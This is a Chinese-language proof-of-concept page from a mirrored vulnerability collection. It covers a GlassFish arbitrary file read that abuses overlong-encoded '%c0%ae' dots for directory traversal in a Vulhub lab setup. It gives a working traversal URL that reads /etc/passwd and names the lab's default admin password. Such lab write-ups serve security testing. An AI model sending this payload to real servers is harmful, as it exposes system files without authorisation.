admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-05 02:37:58 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/GlassFish 任意文件读取漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

1.1 KiB
Raw Blame History

GlassFish 任意文件读取漏洞

漏洞描述

参考阅读:

java语言中会把%c0%ae解析为\uC0AE最后转义为ASCCII字符的.(点)。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。

环境搭建

Vulhub编译、运行测试环境

docker-compose build
docker-compose up -d

环境运行后,访问http://your-ip:8080http://your-ip:4848即可查看web页面。其中8080端口是网站内容4848端口是GlassFish管理中心。

漏洞复现

访问https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd,发现已成功读取/etc/passwd内容:

image-20220223221248955

额外说明

本环境超级管理员密码在docker-compose.yml中设置,默认为vulhub_default_password在4848端口利用该密码可以登录管理员账户。